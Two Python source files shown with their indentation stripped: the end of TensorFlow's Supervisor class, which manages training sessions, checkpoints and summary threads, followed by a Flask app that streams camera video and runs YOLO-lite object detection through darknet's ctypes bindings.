ready_for_local_init_op=USE_DEFAULT):
"""Initializes ready_op.
Args:
ready_op: `Tensor` to check if the model is initialized.
If it's set to USE_DEFAULT, creates an op that checks all
the variables are initialized.
ready_for_local_init_op: `Tensor` to check if the model is ready to run
local_init_op.
If it's set to USE_DEFAULT, creates an op that checks all
the global variables are initialized.
"""
if ready_op is Supervisor.USE_DEFAULT:
ready_op = self._get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.report_uninitialized_variables()
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
self._ready_op = ready_op
# ready_for_local_init_op defaults to None for backward compatibility
if ready_for_local_init_op is Supervisor.USE_DEFAULT:
ready_for_local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.READY_FOR_LOCAL_INIT_OP)
self._ready_for_local_init_op = ready_for_local_init_op
def _init_init_op(self, init_op=USE_DEFAULT, init_feed_dict=None):
"""Initializes init_op.
Args:
init_op: `Operation` to initialize the variables. If set to USE_DEFAULT,
create an op that initializes all variables and tables.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
"""
if init_op is Supervisor.USE_DEFAULT:
init_op = self._get_first_op_from_collection(ops.GraphKeys.INIT_OP)
if init_op is None:
init_op = variables.global_variables_initializer()
ops.add_to_collection(ops.GraphKeys.INIT_OP, init_op)
self._init_op = init_op
self._init_feed_dict = init_feed_dict
def _init_local_init_op(self, local_init_op=USE_DEFAULT):
"""Initializes local_init_op.
Args:
local_init_op: `Operation` run for every new supervisor instance. If set
to USE_DEFAULT, use the first op from the GraphKeys.LOCAL_INIT_OP
collection. If the collection is empty, create an op that initializes
all local variables and all tables.
"""
if local_init_op is Supervisor.USE_DEFAULT:
local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [variables.local_variables_initializer(),
data_flow_ops.initialize_all_tables()]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
self._local_init_op = local_init_op
def _init_saver(self, saver=USE_DEFAULT):
"""Initializes saver.
Args:
saver: A `Saver` object. If set to USE_DEFAULT, create one that
saves all the variables.
"""
if saver is Supervisor.USE_DEFAULT:
saver = self._get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is None and variables.global_variables():
saver = saver_mod.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
self._saver = saver
def _init_summary_op(self, summary_op=USE_DEFAULT):
"""Initializes summary_op.
Args:
summary_op: An Operation that returns a Summary for the event logs.
If set to USE_DEFAULT, create an op that merges all the summaries.
"""
if summary_op is Supervisor.USE_DEFAULT:
summary_op = self._get_first_op_from_collection(ops.GraphKeys.SUMMARY_OP)
if summary_op is None:
summary_op = _summary.merge_all()
if summary_op is not None:
ops.add_to_collection(ops.GraphKeys.SUMMARY_OP, summary_op)
self._summary_op = summary_op
def _init_global_step(self, global_step=USE_DEFAULT):
"""Initializes global_step.
Args:
global_step: An integer Tensor of size 1 that counts steps. If
set to USE_DEFAULT, creates global_step tensor.
"""
if global_step is Supervisor.USE_DEFAULT:
global_step = self._get_first_op_from_collection(
ops.GraphKeys.GLOBAL_STEP)
if global_step is None:
global_step = self._default_global_step_tensor()
if global_step is not None:
ops.add_to_collection(ops.GraphKeys.GLOBAL_STEP, global_step)
self._global_step = global_step
@property
def is_chief(self):
"""Return True if this is a chief supervisor.
Returns:
A bool.
"""
return self._is_chief
@property
def session_manager(self):
"""Return the SessionManager used by the Supervisor.
Returns:
A SessionManager object.
"""
return self._session_manager
@property
def coord(self):
"""Return the Coordinator used by the Supervisor.
The Coordinator can be useful if you want to run multiple threads
during your training.
Returns:
A Coordinator object.
"""
return self._coord
@property
def init_op(self):
"""Return the Init Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._init_op
@property
def init_feed_dict(self):
"""Return the feed dictionary used when evaluating the `init_op`.
Returns:
A feed dictionary or `None`.
"""
return self._init_feed_dict
@property
def ready_op(self):
"""Return the Ready Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def summary_writer(self):
"""Return the SummaryWriter used by the chief supervisor.
Returns:
A SummaryWriter.
"""
return self._summary_writer
@property
def summary_op(self):
"""Return the Summary Tensor used by the chief supervisor.
Returns:
A string Tensor for the summary or `None`.
"""
return self._summary_op
@property
def save_summaries_secs(self):
"""Return the delay between summary computations.
Returns:
The number of seconds between summary computations.
"""
return self._save_summaries_secs
@property
def global_step(self):
"""Return the global_step Tensor used by the supervisor.
Returns:
An integer Tensor for the global_step.
"""
return self._global_step
@property
def saver(self):
"""Return the Saver used by the supervisor.
Returns:
A Saver object.
"""
return self._saver
@property
def save_model_secs(self):
"""Return the delay between checkpoints.
Returns:
The number of seconds between checkpoint saves.
"""
return self._save_model_secs
@property
def save_path(self):
"""Return the save path used by the supervisor.
Returns:
A string.
"""
return self._save_path
def _write_graph(self):
"""Writes graph_def to `logdir` and adds it to summary if applicable."""
assert self._is_chief
if self._logdir:
training_util.write_graph(self._graph.as_graph_def(add_shapes=True),
self._logdir, "graph.pbtxt")
if self._summary_writer and not self._graph_added_to_summary:
self._summary_writer.add_graph(self._graph)
self._summary_writer.add_meta_graph(self._meta_graph_def)
self._graph_added_to_summary = True
def start_standard_services(self, sess):
"""Start the standard services for 'sess'.
This starts services in the background. The services started depend
on the parameters to the constructor and may include:
- A Summary thread computing summaries every save_summaries_secs.
- A Checkpoint thread saving the model every save_model_secs.
- A StepCounter thread to measure step time.
Args:
sess: A Session.
Returns:
A list of threads that are running the standard services. You can use
the Supervisor's Coordinator to join these threads with:
sv.coord.join(<list of threads>)
Raises:
RuntimeError: If called with a non-chief Supervisor.
ValueError: If no `logdir` was passed to the constructor, as the
services need a log directory.
"""
if not self._is_chief:
raise RuntimeError("Only chief supervisor can start standard services. "
"Because only chief supervisors can write events.")
if not self._logdir:
logging.warning("Standard services need a 'logdir' "
"passed to the SessionManager")
return
if self._global_step is not None and self._summary_writer:
# Only add the session log if we keep track of global step.
# TensorBoard cannot use START message for purging expired events
# if there is no step value.
current_step = training_util.global_step(sess, self._global_step)
self._summary_writer.add_session_log(
SessionLog(status=SessionLog.START),
current_step)
threads = []
if self._save_summaries_secs and self._summary_writer:
if self._summary_op is not None:
threads.append(SVSummaryThread(self, sess))
if self._global_step is not None:
threads.append(SVStepCounterThread(self, sess))
if self.saver and self._save_model_secs:
threads.append(SVTimerCheckpointThread(self, sess))
for t in threads:
t.start()
return threads
def prepare_or_wait_for_session(self, master="", config=None,
wait_for_checkpoint=False,
max_wait_secs=7200,
start_standard_services=True):
"""Make sure the model is ready to be used.
Create a session on 'master', recovering or initializing the model as
needed, or wait for a session to be ready. If running as the chief
and `start_standard_services` is set to True, also call the session
manager to start the standard services.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional ConfigProto proto used to configure the session,
which is passed as-is to create the session.
wait_for_checkpoint: Whether we should wait for the availability of a
checkpoint before creating Session. Defaults to False.
max_wait_secs: Maximum time to wait for the session to become available.
start_standard_services: Whether to start the standard services and the
queue runners.
Returns:
A Session object that can be used to drive the model.
"""
# For users who recreate the session with prepare_or_wait_for_session(), we
# need to clear the coordinator's stop_event so that threads managed by the
# coordinator can run.
self._coord.clear_stop()
if self._summary_writer:
self._summary_writer.reopen()
if self._is_chief:
sess = self._session_manager.prepare_session(
master, init_op=self.init_op, saver=self.saver,
checkpoint_dir=self._logdir, wait_for_checkpoint=wait_for_checkpoint,
max_wait_secs=max_wait_secs, config=config,
init_feed_dict=self._init_feed_dict, init_fn=self._init_fn)
self._write_graph()
if start_standard_services:
self.start_standard_services(sess)
else:
sess = self._session_manager.wait_for_session(master,
config=config,
max_wait_secs=max_wait_secs)
if start_standard_services:
self.start_queue_runners(sess)
return sess
def start_queue_runners(self, sess, queue_runners=None):
"""Start threads for `QueueRunners`.
Note that the queue runners collected in the graph key `QUEUE_RUNNERS`
are already started automatically when you create a session with the
supervisor, so unless you have non-collected queue runners to start
you do not need to call this explicitly.
Args:
sess: A `Session`.
queue_runners: A list of `QueueRunners`. If not specified, we'll use the
list of queue runners gathered in the graph under the key
`GraphKeys.QUEUE_RUNNERS`.
Returns:
The list of threads started for the `QueueRunners`.
"""
if queue_runners is None:
queue_runners = self._graph.get_collection(ops.GraphKeys.QUEUE_RUNNERS)
threads = []
for qr in queue_runners:
threads.extend(qr.create_threads(sess, coord=self._coord, daemon=True,
start=True))
return threads
def loop(self, timer_interval_secs, target, args=None, kwargs=None):
"""Start a LooperThread that calls a function periodically.
If `timer_interval_secs` is None the thread calls `target(*args, **kwargs)`
repeatedly. Otherwise it calls it every `timer_interval_secs`
seconds. The thread terminates when a stop is requested.
The started thread is added to the list of threads managed by the supervisor
so it does not need to be passed to the `stop()` method.
Args:
timer_interval_secs: Number. Time boundaries at which to call `target`.
target: A callable object.
args: Optional arguments to pass to `target` when calling it.
kwargs: Optional keyword arguments to pass to `target` when calling it.
Returns:
The started thread.
"""
looper = coordinator.LooperThread(self._coord, timer_interval_secs,
target=target, args=args, kwargs=kwargs)
looper.start()
return looper
def stop(self, threads=None, close_summary_writer=True):
"""Stop the services and the coordinator.
This does not close the session.
Args:
threads: Optional list of threads to join with the coordinator. If
`None`, defaults to the threads running the standard services, the
threads started for `QueueRunners`, and the threads started by the
`loop()` method. To wait on additional threads, pass the
list in this parameter.
close_summary_writer: Whether to close the `summary_writer`. Defaults to
`True` if the summary writer was created by the supervisor, `False`
otherwise.
"""
self._coord.request_stop()
try:
# coord.join() re-raises the first reported exception; the "finally"
# block ensures that we clean up whether or not an exception was
# reported.
self._coord.join(threads,
stop_grace_period_secs=self._stop_grace_secs)
finally:
# Close the writer last, in case one of the running threads was using it.
if close_summary_writer and self._summary_writer:
# Stop messages are not logged with event.step,
# since the session may have already terminated.
self._summary_writer.add_session_log(SessionLog(status=SessionLog.STOP))
self._summary_writer.close()
self._graph_added_to_summary = False
def request_stop(self, ex=None):
"""Request that the coordinator stop the threads.
See `Coordinator.request_stop()`.
Args:
ex: Optional `Exception`, or Python `exc_info` tuple as returned by
`sys.exc_info()`. If this is the first call to `request_stop()` the
corresponding exception is recorded and re-raised from `join()`.
"""
self._coord.request_stop(ex=ex)
def should_stop(self):
"""Check if the coordinator was told to stop.
See `Coordinator.should_stop()`.
Returns:
True if the coordinator was told to stop, False otherwise.
"""
return self._coord.should_stop()
def stop_on_exception(self):
"""Context handler to stop the supervisor when an exception is raised.
See `Coordinator.stop_on_exception()`.
Returns:
A context handler.
"""
return self._coord.stop_on_exception()
def wait_for_stop(self):
"""Block waiting for the coordinator to stop."""
self._coord.wait_for_stop()
def summary_computed(self, sess, summary, global_step=None):
"""Indicate that a summary was computed.
Args:
sess: A `Session` object.
summary: A Summary proto, or a string holding a serialized summary proto.
global_step: Int. global step this summary is associated with. If `None`,
it will try to fetch the current step.
Raises:
TypeError: if 'summary' is not a Summary proto or a string.
RuntimeError: if the Supervisor was created without a `logdir`.
"""
if not self._summary_writer:
raise RuntimeError("Writing a summary requires a summary writer.")
if global_step is None and self.global_step is not None:
global_step = training_util.global_step(sess, self.global_step)
self._summary_writer.add_summary(summary, global_step)
def _default_global_step_tensor(self):
"""Returns the global_step from the default graph.
Returns:
The global step `Tensor` or `None`.
"""
try:
gs = ops.get_default_graph().get_tensor_by_name("global_step:0")
if gs.dtype.base_dtype in [dtypes.int32, dtypes.int64]:
return gs
else:
logging.warning("Found 'global_step' is not an int type: %s", gs.dtype)
return None
except KeyError:
return None
def _verify_setup(self):
"""Check that all is good.
Raises:
ValueError: If something is not good.
"""
# Not running as chief means that replicas are used.
# In that case all Variables must have their device set.
if not self._is_chief:
for op in self._graph.get_operations():
if op.type in ["Variable", "VariableV2"] and not op.device:
raise ValueError("When using replicas, all Variables must have "
"their device set: %s" % op)
# pylint: disable=g-doc-return-or-yield,broad-except
@contextlib.contextmanager
def managed_session(self, master="", config=None,
start_standard_services=True,
close_summary_writer=True):
"""Returns a context manager for a managed session.
This context manager creates and automatically recovers a session. It
optionally starts the standard services that handle checkpoints and
summaries. It monitors exceptions raised from the `with` block or from the
services and stops the supervisor as needed.
The context manager is typically used as follows:
```python
def train():
sv = tf.train.Supervisor(...)
with sv.managed_session(<master>) as sess:
for step in xrange(..):
if sv.should_stop():
break
sess.run(<my training op>)
...do other things needed at each training step...
```
An exception raised from the `with` block or one of the service threads is
raised again when the block exits. This is done after stopping all threads
and closing the session. For example, an `AbortedError` exception, raised
in case of preemption of one of the workers in a distributed model, is
raised again when the block exits.
If you want to retry the training loop in case of preemption you can do it
as follows:
```python
def main(...):
while True:
try:
train()
except tf.errors.AbortedError:
pass
```
As a special case, exceptions used for control flow, such as
`OutOfRangeError` which reports that input queues are exhausted, are not
raised again from the `with` block: they indicate a clean termination of
the training loop and are considered normal termination.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional `ConfigProto` proto used to configure the session.
Passed as-is to create the session.
start_standard_services: Whether to start the standard services,
such as checkpoint, summary and step counter.
close_summary_writer: Whether to close the summary writer when
closing the session. Defaults to True.
Returns:
A context manager that yields a `Session` restored from the latest
checkpoint or initialized from scratch if no checkpoint exists. The
session is closed when the `with` block exits.
"""
try:
sess = self.prepare_or_wait_for_session(
master=master, config=config,
start_standard_services=start_standard_services)
yield sess
except Exception as e:
self.request_stop(e)
finally:
try:
# Request all the threads to stop and wait for them to do so. Any
# exception raised by the threads is raised again from stop().
# Passing stop_grace_period_secs is for blocked enqueue/dequeue
# threads which are not checking for `should_stop()`. They
# will be stopped when we close the session further down.
self.stop(close_summary_writer=close_summary_writer)
finally:
# Close the session to finish up all pending calls. We do not care
# about exceptions raised when closing. This takes care of
# blocked enqueue/dequeue calls.
try:
sess.close()
except Exception:
# Silently ignore exceptions raised by close().
pass
# pylint: enable=g-doc-return-or-yield,broad-except
class SVSummaryThread(coordinator.LooperThread):
"""A thread to save summaries on a timer."""
def __init__(self, sv, sess):
"""Create a SVSummaryThread.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVSummaryThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
if self._sv.global_step is not None:
summary_strs, global_step = self._sess.run([self._sv.summary_op,
self._sv.global_step])
else:
summary_strs = self._sess.run(self._sv.summary_op)
global_step = None
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary_strs, global_step)
class SVStepCounterThread(coordinator.LooperThread):
"""Threads to count steps and measure their duration."""
def __init__(self, sv, sess):
"""Create a `SVStepCounterThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVStepCounterThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
self._last_time = 0.0
self._last_step = 0
self._summary_tag = "%s/sec" % self._sv.global_step.op.name
def start_loop(self):
self._last_time = time.time()
self._last_step = training_util.global_step(
self._sess, self._sv.global_step)
def run_loop(self):
# Count the steps.
current_step = training_util.global_step(self._sess, self._sv.global_step)
added_steps = current_step - self._last_step
self._last_step = current_step
# Measure the elapsed time.
current_time = time.time()
elapsed_time = current_time - self._last_time
self._last_time = current_time
# Reports the number of steps done per second
steps_per_sec = added_steps / elapsed_time
summary = Summary(value=[Summary.Value(tag=self._summary_tag,
simple_value=steps_per_sec)])
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary, current_step)
logging.log_first_n(logging.INFO, "%s: %g", 10,
self._summary_tag, steps_per_sec)
class SVTimerCheckpointThread(coordinator.LooperThread):
"""A thread to checkpoint on a timer."""
def __init__(self, sv, sess):
"""Create a `SVTimerCheckpointThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVTimerCheckpointThread, self).__init__(sv.coord, sv.save_model_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
self._sv.saver.save(self._sess, self._sv.save_path,
global_step=self._sv.global_step)
if self._sv.summary_writer and self._sv.global_step is not None:
current_step = training_util.global_step(self._sess, self._sv.global_step)
self._sv.summary_writer.add_session_log(
SessionLog(status=SessionLog.CHECKPOINT,
checkpoint_path=self._sv.save_path),
current_step)
# TODO(sherrym): All non-PEP8 compliant names will be deprecated shortly.
setattr(Supervisor, "PrepareSession", Supervisor.prepare_or_wait_for_session)
setattr(Supervisor, "StartQueueRunners", Supervisor.start_queue_runners)
setattr(Supervisor, "StartStandardServices", Supervisor.start_standard_services)
setattr(Supervisor, "Stop", Supervisor.stop)
setattr(Supervisor, "RequestStop", Supervisor.request_stop)
setattr(Supervisor, "Loop", Supervisor.loop)
setattr(Supervisor, "ShouldStop", Supervisor.should_stop)
setattr(Supervisor, "StopOnException", Supervisor.stop_on_exception)
setattr(Supervisor, "WaitForStop", Supervisor.wait_for_stop)
setattr(Supervisor, "SummaryComputed", Supervisor.summary_computed)
|
app.py
|
'''
author(s): xujing from Medcare
date: 2019-03-20
Flask serves an OpenCV video stream and runs object detection based on yolo-lite.
Solved:
embedding the OpenCV video stream in HTML
displaying Chinese text with OpenCV putText
calling yolo-lite through darknet
multithreading, multiple clients connecting at the same time
updating the echarts JSON data asynchronously via ajax to plot detection results in real time!
Issue: without a GPU, yolo-lite does not reach the FPS claimed in the paper!
'''
from flask import Response
from flask import Flask
from flask import render_template
import os
import uuid
import threading
import argparse
from ctypes import *
import math
import random
import numpy as np
import configparser
import imutils
import cv2
from imutils.video import VideoStream
from PIL import Image,ImageDraw,ImageFont
import matplotlib.cm as mpcm
import datetime
import time
from pyecharts.charts import Bar
from pyecharts import options as opts
app = Flask(__name__)
outputFrame = None
temp_str = str(uuid.uuid1())
print(temp_str)
lock = threading.Lock()
config = configparser.ConfigParser()
config.read('config.ini')
if config['IPCapture']['IP'] != 'no':
# vs = VideoStream(src= config['IPCapture']['IP']).start() # IP camera
vs = cv2.VideoCapture(config['IPCapture']['IP']) # IP camera
elif config['USBCapture']['USB'] != 'no':
# vs = VideoStream(src=0).start() # USB camera or capture-card device
vs = cv2.VideoCapture(0) # USB camera or capture-card device
elif config['PiCamera']['PI'] != 'no':
# vs = VideoStream(usePiCamera=1).start() # Raspberry Pi camera
vs = cv2.VideoCapture(1) # Raspberry Pi camera
elif config['VideoPath']['PATH'] != 'no':
# vs = VideoStream(src="test.mp4").start() # local video file
vs = cv2.VideoCapture("test.mp4") # local video file
hasGPU = config['Device']['Device']
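# Illustrative config.ini layout assumed by the reads above; the values are
# placeholders, and any unused source is the literal string 'no':
#
#   [IPCapture]
#   IP = no
#   [USBCapture]
#   USB = yes
#   [PiCamera]
#   PI = no
#   [VideoPath]
#   PATH = no
#   [Device]
#   Device = False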
label_name = ['aeroplane','bicycle','bird','boat','bottle','bus','car','cat','chair','cow',
'diningtable','dog','horse','motorbike','person','pottedplant','sheep','sofa','train','tvmonitor']
probs = [0.0] * len(label_name)
time.sleep(2.0)
# --------------------------- calling yolo-lite through darknet --------------------------------
def change_cv2_draw(image,strs,local,sizes,colour):
'''Work around OpenCV putText's problem displaying Chinese text
'''
cv2img = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)
pilimg = Image.fromarray(cv2img)
draw = ImageDraw.Draw(pilimg)
font = ImageFont.truetype("./static/fonts/Microsoft-Yahei-UI-Light.ttc",sizes,encoding='utf-8')
draw.text(local,strs,colour,font=font)
image = cv2.cvtColor(np.array(pilimg),cv2.COLOR_RGB2BGR)
return image
def colors_subselect(colors, num_classes=20):
'''Subsample colormap colors into one color per class
'''
dt = len(colors) // num_classes
sub_colors = []
for i in range(num_classes):
color = colors[i*dt]
if isinstance(color[0], float):
sub_colors.append([int(c * 255) for c in color])
else:
sub_colors.append([c for c in color])
return sub_colors
colors = colors_subselect(mpcm.plasma.colors, num_classes=20)
colors_tableau = [(255, 152, 150),(148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),
(227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),
(188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229),
(188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229),
(255, 152, 150),(148, 103, 189), (197, 176, 213)]
# helper functions and ctypes structures needed to call darknet
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int),
("uc", POINTER(c_float))]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
if os.name == "nt":
cwd = os.path.dirname(__file__)
os.environ['PATH'] = cwd + ';' + os.environ['PATH']
if hasGPU == "True":
winGPUdll = os.path.join(cwd, "yolo_cpp_dll.dll") # GPU!
lib = CDLL(winGPUdll, RTLD_GLOBAL)
else:
winNoGPUdll = os.path.join(cwd, "yolo_cpp_dll_no_gpu.dll")
lib = CDLL(winNoGPUdll, RTLD_GLOBAL)
else:
lib = CDLL("./libdarknet.so", RTLD_GLOBAL) # Lunix
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
copy_image_from_bytes = lib.copy_image_from_bytes
copy_image_from_bytes.argtypes = [IMAGE,c_char_p]
def network_width(net):
return lib.network_width(net)
def network_height(net):
return lib.network_height(net)
predict = lib.network_predict_ptr
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
if hasGPU == "True":  # hasGPU is read from config.ini as a string, so compare explicitly
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int), c_int]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict_ptr
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
load_net_custom = lib.load_network_custom
load_net_custom.argtypes = [c_char_p, c_char_p, c_int, c_int]
load_net_custom.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE]
predict_image.restype = POINTER(c_float)
predict_image_letterbox = lib.network_predict_image_letterbox
predict_image_letterbox.argtypes = [c_void_p, IMAGE]
predict_image_letterbox.restype = POINTER(c_float)
def array_to_image(arr):
import numpy as np
# need to return old values to avoid python freeing memory
arr = arr.transpose(2,0,1)
c = arr.shape[0]
h = arr.shape[1]
w = arr.shape[2]
arr = np.ascontiguousarray(arr.flat, dtype=np.float32) / 255.0
data = arr.ctypes.data_as(POINTER(c_float))
im = IMAGE(w,h,c,data)
return im, arr
def classify(net, meta, im):
out = predict_image(net, im)
res = []
for i in range(meta.classes):
if altNames is None:
nameTag = meta.names[i]
else:
nameTag = altNames[i]
res.append((nameTag, out[i]))
res = sorted(res, key=lambda x: -x[1])
return res
def detect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45, debug= False):
"""
Performs the meat of the detection
"""
im = load_image(image, 0, 0)
if debug: print("Loaded image")
ret = detect_image(net, meta, im, thresh, hier_thresh, nms, debug)
free_image(im)
if debug: print("freed image")
return ret
def detect_image(net, meta, im, thresh=.5, hier_thresh=.5, nms=.45, debug= False):
num = c_int(0)
if debug: print("Assigned num")
pnum = pointer(num)
if debug: print("Assigned pnum")
predict_image(net, im)
letter_box = 0
#predict_image_letterbox(net, im)
#letter_box = 1
if debug: print("did prediction")
#dets = get_network_boxes(net, custom_image_bgr.shape[1], custom_image_bgr.shape[0], thresh, hier_thresh, None, 0, pnum, letter_box) # OpenCV
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum, letter_box)
if debug: print("Got dets")
num = pnum[0]
if debug: print("got zeroth index of pnum")
if nms:
do_nms_sort(dets, num, meta.classes, nms)
if debug: print("did sort")
res = []
if debug: print("about to range")
for j in range(num):
if debug: print("Ranging on "+str(j)+" of "+str(num))
if debug: print("Classes: "+str(meta), meta.classes, meta.names)
for i in range(meta.classes):
if debug: print("Class-ranging on "+str(i)+" of "+str(meta.classes)+"= "+str(dets[j].prob[i]))
if dets[j].prob[i] > 0:
b = dets[j].bbox
if altNames is None:
nameTag = meta.names[i]
else:
nameTag = altNames[i]
if debug:
print("Got bbox", b)
print(nameTag)
print(dets[j].prob[i])
print((b.x, b.y, b.w, b.h))
res.append((nameTag, dets[j].prob[i], (b.x, b.y, b.w, b.h)))
if debug: print("did range")
res = sorted(res, key=lambda x: -x[1])
if debug: print("did sort")
free_detections(dets, num)
if debug: print("freed detections")
return res
netMain = None
metaMain = None
altNames = None
def performDetect(imagePath="test.jpg", thresh=0.5, configPath="./model/tiny-yolov2-trial13-noBatch.cfg", weightPath="./model/tiny-yolov2-trial13_noBatch.weights", metaPath="./model/voc.data", showImage=True, makeImageOnly=False, initOnly=False):
global metaMain, netMain, altNames #pylint: disable=W0603
assert 0 < thresh < 1, "Threshold should be a float between zero and one (non-inclusive)"
if not os.path.exists(configPath):
raise ValueError("Invalid config path `"+os.path.abspath(configPath)+"`")
if not os.path.exists(weightPath):
raise ValueError("Invalid weight path `"+os.path.abspath(weightPath)+"`")
if not os.path.exists(metaPath):
raise ValueError("Invalid data file path `"+os.path.abspath(metaPath)+"`")
if netMain is None:
netMain = load_net_custom(configPath.encode("ascii"), weightPath.encode("ascii"), 0, 1) # batch size = 1
if metaMain is None:
metaMain = load_meta(metaPath.encode("ascii"))
if altNames is None:
# In Python 3, the metafile default access craps out on Windows (but not Linux)
# Read the names file and create a list to feed to detect
try:
with open(metaPath) as metaFH:
metaContents = metaFH.read()
import re
match = re.search("names *= *(.*)$", metaContents, re.IGNORECASE | re.MULTILINE)
if match:
result = match.group(1)
else:
result = None
try:
if os.path.exists(result):
with open(result) as namesFH:
namesList = namesFH.read().strip().split("\n")
altNames = [x.strip() for x in namesList]
except TypeError:
pass
except Exception:
pass
if initOnly:
print("Initialized detector")
return None
if not os.path.exists(imagePath):
raise ValueError("Invalid image path `"+os.path.abspath(imagePath)+"`")
# Do the detection
#detections = detect(netMain, metaMain, imagePath, thresh) # if is used cv2.imread(image)
detections = detect(netMain, metaMain, imagePath.encode("ascii"), thresh)
if showImage:
try:
scale = 0.4
text_thickness = 1
line_type = 8
thickness=2
image = cv2.imread(imagePath)
print("*** "+str(len(detections))+" Results, color coded by confidence ***")
imcaption = []
img_prob = [0.0]*len(label_name)
for detection in detections:
label = detection[0]
confidence = detection[1]
pstring = label+": "+str(np.rint(100 * confidence))+"%"
img_prob[label_name.index(label)] = np.rint(100 * confidence)
imcaption.append(pstring)
print(pstring)
bounds = detection[2]
shape = image.shape
yExtent = int(bounds[3])
xEntent = int(bounds[2])
# Coordinates are around the center
xCoord = int(bounds[0] - bounds[2]/2)
yCoord = int(bounds[1] - bounds[3]/2)
color = colors_tableau[label_name.index(detection[0])]
p1 = (xCoord, yCoord)
p2 = (xCoord + xEntent,yCoord + yExtent)
if (p2[0] - p1[0] < 1) or (p2[1] - p1[1] < 1):
continue
cv2.rectangle(image, p1, p2, color, thickness)
text_size, baseline = cv2.getTextSize(pstring, cv2.FONT_HERSHEY_SIMPLEX, scale, text_thickness)
cv2.rectangle(image, (p1[0], p1[1] - thickness*10 - baseline), (p1[0] + 2*(text_size[0]-20), p1[1]), color, -1)
image = change_cv2_draw(image,pstring,(p1[0],p1[1]-7*baseline),20,(255,255,255))
except Exception as e:
print("Unable to show image: "+str(e))
return image, img_prob
# -------------------------- Flask calling OpenCV and YOLO-lite ------------------------------------
# index view function
@app.route("/", methods=['GET'])
def index():
return render_template("index.html")
def detect_yolo_lite():
'''
Run yolo-lite detection on the video stream
'''
global vs, outputFrame, lock, probs
total = 0
while True:
ret,frame = vs.read()
total += 1
# frame = imutils.resize(frame, width=400)
# if total/10 == 0:
save_path = "./static/images/"+ temp_str + ".jpg"
cv2.imwrite(save_path,frame)
frame, probs = performDetect(imagePath=save_path)
# print(frame)
with lock: # thread lock to make sure the current thread's data is not modified by other threads!
outputFrame = frame
